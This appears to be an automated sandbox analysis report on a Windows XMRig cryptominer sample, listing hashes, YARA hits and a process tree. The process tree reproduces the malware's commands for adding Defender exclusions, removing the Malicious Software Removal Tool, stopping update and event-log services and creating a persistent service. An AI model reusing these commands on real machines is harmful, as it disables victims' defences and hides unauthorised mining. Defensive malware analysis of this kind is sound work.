Analysis
-
max time kernel
91s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240220-en -
resource tags
arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system -
submitted
22-05-2024 02:13
Static task
static1
Behavioral task
behavioral1
Sample
829a7217425797382c0bf0e4af76ba49ed1e6592725a445e6e5da48ea53f6670.exe
Resource
win7-20240220-en
General
-
Target
829a7217425797382c0bf0e4af76ba49ed1e6592725a445e6e5da48ea53f6670.exe
-
Size
5.3MB
-
MD5
7cb35be5ff69f1d6ac6fda8c63159e49
-
SHA1
048cd03b6a8aff39074aa0c9132cdaf980fa76fa
-
SHA256
829a7217425797382c0bf0e4af76ba49ed1e6592725a445e6e5da48ea53f6670
-
SHA512
eb35047cd754ae47e3019aab74983b311cbcc2937548b9d951bda137d718fffdecf1574bac75e344f9abdd2f2a4ddd6a9032c7f0ab137446cca2ac987e6765a3
-
SSDEEP
98304:xRjPz9KDzUU8O5/B/LJ25E9SVh86sS3TRknQ3ss2MApp9meypA3cPDu7:xFKoU8O5/b2XViSjX310SeyGc7u7
Malware Config
Signatures
-
UPX dump on OEP (original entry point) 12 IoCs
Processes:
resource yara_rule behavioral1/memory/2256-31-0x0000000140000000-0x0000000140848000-memory.dmp UPX behavioral1/memory/2256-28-0x0000000140000000-0x0000000140848000-memory.dmp UPX behavioral1/memory/2256-35-0x0000000140000000-0x0000000140848000-memory.dmp UPX behavioral1/memory/2256-36-0x0000000140000000-0x0000000140848000-memory.dmp UPX behavioral1/memory/2256-39-0x0000000140000000-0x0000000140848000-memory.dmp UPX behavioral1/memory/2256-38-0x0000000140000000-0x0000000140848000-memory.dmp UPX behavioral1/memory/2256-37-0x0000000140000000-0x0000000140848000-memory.dmp UPX behavioral1/memory/2256-33-0x0000000140000000-0x0000000140848000-memory.dmp UPX behavioral1/memory/2256-32-0x0000000140000000-0x0000000140848000-memory.dmp UPX behavioral1/memory/2256-30-0x0000000140000000-0x0000000140848000-memory.dmp UPX behavioral1/memory/2256-29-0x0000000140000000-0x0000000140848000-memory.dmp UPX behavioral1/memory/2256-40-0x0000000140000000-0x0000000140848000-memory.dmp UPX -
XMRig Miner payload 8 IoCs
Processes:
resource yara_rule behavioral1/memory/2256-35-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2256-36-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2256-39-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2256-38-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2256-37-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2256-33-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2256-32-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2256-40-0x0000000140000000-0x0000000140848000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepid process 2364 powershell.exe 2000 powershell.exe -
Creates new service(s) 2 TTPs
-
Deletes itself 1 IoCs
Processes:
cmd.exepid process 2624 cmd.exe -
Executes dropped EXE 2 IoCs
Processes:
lutlgidagtja.exepid process 480 2932 lutlgidagtja.exe -
Loads dropped DLL 1 IoCs
Processes:
pid process 480 -
Processes:
resource yara_rule behavioral1/memory/2256-27-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2256-31-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2256-28-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2256-35-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2256-36-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2256-39-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2256-38-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2256-37-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2256-33-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2256-32-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2256-30-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2256-29-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2256-40-0x0000000140000000-0x0000000140848000-memory.dmp upx -
Drops file in System32 directory 4 IoCs
Processes:
lutlgidagtja.exepowershell.exe829a7217425797382c0bf0e4af76ba49ed1e6592725a445e6e5da48ea53f6670.exepowershell.exedescription ioc process File opened for modification C:\Windows\system32\MRT.exe lutlgidagtja.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe 829a7217425797382c0bf0e4af76ba49ed1e6592725a445e6e5da48ea53f6670.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
lutlgidagtja.exedescription pid process target process PID 2932 set thread context of 2124 2932 lutlgidagtja.exe conhost.exe PID 2932 set thread context of 2256 2932 lutlgidagtja.exe nslookup.exe -
Drops file in Windows directory 2 IoCs
Processes:
wusa.exewusa.exedescription ioc process File created C:\Windows\wusa.lock wusa.exe File created C:\Windows\wusa.lock wusa.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 2664 sc.exe 2684 sc.exe 308 sc.exe 2732 sc.exe 2796 sc.exe 2472 sc.exe 2492 sc.exe 2576 sc.exe 2760 sc.exe 272 sc.exe 876 sc.exe 2940 sc.exe 2536 sc.exe 2420 sc.exe -
Modifies data under HKEY_USERS 2 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = e0c5d8a1edabda01 powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
829a7217425797382c0bf0e4af76ba49ed1e6592725a445e6e5da48ea53f6670.exepowershell.exelutlgidagtja.exepowershell.exenslookup.exepid process 1800 829a7217425797382c0bf0e4af76ba49ed1e6592725a445e6e5da48ea53f6670.exe 2364 powershell.exe 1800 829a7217425797382c0bf0e4af76ba49ed1e6592725a445e6e5da48ea53f6670.exe 1800 829a7217425797382c0bf0e4af76ba49ed1e6592725a445e6e5da48ea53f6670.exe 1800 829a7217425797382c0bf0e4af76ba49ed1e6592725a445e6e5da48ea53f6670.exe 1800 829a7217425797382c0bf0e4af76ba49ed1e6592725a445e6e5da48ea53f6670.exe 1800 829a7217425797382c0bf0e4af76ba49ed1e6592725a445e6e5da48ea53f6670.exe 1800 829a7217425797382c0bf0e4af76ba49ed1e6592725a445e6e5da48ea53f6670.exe 1800 829a7217425797382c0bf0e4af76ba49ed1e6592725a445e6e5da48ea53f6670.exe 1800 829a7217425797382c0bf0e4af76ba49ed1e6592725a445e6e5da48ea53f6670.exe 1800 829a7217425797382c0bf0e4af76ba49ed1e6592725a445e6e5da48ea53f6670.exe 1800 829a7217425797382c0bf0e4af76ba49ed1e6592725a445e6e5da48ea53f6670.exe 1800 829a7217425797382c0bf0e4af76ba49ed1e6592725a445e6e5da48ea53f6670.exe 1800 829a7217425797382c0bf0e4af76ba49ed1e6592725a445e6e5da48ea53f6670.exe 1800 829a7217425797382c0bf0e4af76ba49ed1e6592725a445e6e5da48ea53f6670.exe 1800 829a7217425797382c0bf0e4af76ba49ed1e6592725a445e6e5da48ea53f6670.exe 1800 829a7217425797382c0bf0e4af76ba49ed1e6592725a445e6e5da48ea53f6670.exe 2932 lutlgidagtja.exe 2000 powershell.exe 2932 lutlgidagtja.exe 2932 lutlgidagtja.exe 2932 lutlgidagtja.exe 2932 lutlgidagtja.exe 2932 lutlgidagtja.exe 2932 lutlgidagtja.exe 2932 lutlgidagtja.exe 2932 lutlgidagtja.exe 2932 lutlgidagtja.exe 2932 lutlgidagtja.exe 2932 lutlgidagtja.exe 2932 lutlgidagtja.exe 2256 nslookup.exe 2256 nslookup.exe 2256 nslookup.exe 2256 nslookup.exe 2256 nslookup.exe 2256 nslookup.exe 2256 nslookup.exe 2256 nslookup.exe 2256 nslookup.exe 2256 nslookup.exe 2256 nslookup.exe 2256 nslookup.exe 2256 nslookup.exe 2256 nslookup.exe 2256 nslookup.exe 2256 nslookup.exe 2256 nslookup.exe 2256 nslookup.exe 2256 nslookup.exe 2256 nslookup.exe 2256 nslookup.exe 2256 nslookup.exe 2256 nslookup.exe 2256 nslookup.exe 2256 nslookup.exe 2256 nslookup.exe 2256 nslookup.exe 2256 nslookup.exe 2256 nslookup.exe 2256 nslookup.exe 2256 nslookup.exe 2256 nslookup.exe 2256 nslookup.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
Processes:
powershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exenslookup.exedescription pid process Token: SeDebugPrivilege 2364 powershell.exe Token: SeShutdownPrivilege 760 powercfg.exe Token: SeShutdownPrivilege 2456 powercfg.exe Token: SeShutdownPrivilege 2620 powercfg.exe Token: SeShutdownPrivilege 2448 powercfg.exe Token: SeDebugPrivilege 2000 powershell.exe Token: SeShutdownPrivilege 1332 powercfg.exe Token: SeShutdownPrivilege 1336 powercfg.exe Token: SeShutdownPrivilege 860 powercfg.exe Token: SeShutdownPrivilege 1448 powercfg.exe Token: SeLockMemoryPrivilege 2256 nslookup.exe -
Suspicious use of WriteProcessMemory 23 IoCs
Processes:
cmd.execmd.execmd.exelutlgidagtja.exedescription pid process target process PID 2660 wrote to memory of 2572 2660 cmd.exe wusa.exe PID 2660 wrote to memory of 2572 2660 cmd.exe wusa.exe PID 2660 wrote to memory of 2572 2660 cmd.exe wusa.exe PID 2624 wrote to memory of 2900 2624 cmd.exe choice.exe PID 2624 wrote to memory of 2900 2624 cmd.exe choice.exe PID 2624 wrote to memory of 2900 2624 cmd.exe choice.exe PID 1524 wrote to memory of 1648 1524 cmd.exe wusa.exe PID 1524 wrote to memory of 1648 1524 cmd.exe wusa.exe PID 1524 wrote to memory of 1648 1524 cmd.exe wusa.exe PID 2932 wrote to memory of 2124 2932 lutlgidagtja.exe conhost.exe PID 2932 wrote to memory of 2124 2932 lutlgidagtja.exe conhost.exe PID 2932 wrote to memory of 2124 2932 lutlgidagtja.exe conhost.exe PID 2932 wrote to memory of 2124 2932 lutlgidagtja.exe conhost.exe PID 2932 wrote to memory of 2124 2932 lutlgidagtja.exe conhost.exe PID 2932 wrote to memory of 2124 2932 lutlgidagtja.exe conhost.exe PID 2932 wrote to memory of 2124 2932 lutlgidagtja.exe conhost.exe PID 2932 wrote to memory of 2124 2932 lutlgidagtja.exe conhost.exe PID 2932 wrote to memory of 2124 2932 lutlgidagtja.exe conhost.exe PID 2932 wrote to memory of 2256 2932 lutlgidagtja.exe nslookup.exe PID 2932 wrote to memory of 2256 2932 lutlgidagtja.exe nslookup.exe PID 2932 wrote to memory of 2256 2932 lutlgidagtja.exe nslookup.exe PID 2932 wrote to memory of 2256 2932 lutlgidagtja.exe nslookup.exe PID 2932 wrote to memory of 2256 2932 lutlgidagtja.exe nslookup.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\829a7217425797382c0bf0e4af76ba49ed1e6592725a445e6e5da48ea53f6670.exe"C:\Users\Admin\AppData\Local\Temp\829a7217425797382c0bf0e4af76ba49ed1e6592725a445e6e5da48ea53f6670.exe"1⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1800 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2364 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:2660 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵
- Drops file in Windows directory
PID:2572 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:2664 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:2576 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:2684 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:2796 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:2472 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:760 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:2620 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:2448 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:2456 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "JIOGRCSG"2⤵
- Launches sc.exe
PID:2492 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "JIOGRCSG" binpath= "C:\ProgramData\zvycwxhpsxqt\lutlgidagtja.exe" start= "auto"2⤵
- Launches sc.exe
PID:2940 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog2⤵
- Launches sc.exe
PID:2536 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "JIOGRCSG"2⤵
- Launches sc.exe
PID:2760 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\829a7217425797382c0bf0e4af76ba49ed1e6592725a445e6e5da48ea53f6670.exe"2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:2624 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:2900
-
C:\ProgramData\zvycwxhpsxqt\lutlgidagtja.exeC:\ProgramData\zvycwxhpsxqt\lutlgidagtja.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2932 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2000 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:1524 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵
- Drops file in Windows directory
PID:1648 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:272 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:308 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:2420 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:2732 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:876 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:1448 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:860 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:1332 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:1336 -
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:2124
-
C:\Windows\system32\nslookup.exenslookup.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2256
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5.3MB
MD57cb35be5ff69f1d6ac6fda8c63159e49
SHA1048cd03b6a8aff39074aa0c9132cdaf980fa76fa
SHA256829a7217425797382c0bf0e4af76ba49ed1e6592725a445e6e5da48ea53f6670
SHA512eb35047cd754ae47e3019aab74983b311cbcc2937548b9d951bda137d718fffdecf1574bac75e344f9abdd2f2a4ddd6a9032c7f0ab137446cca2ac987e6765a3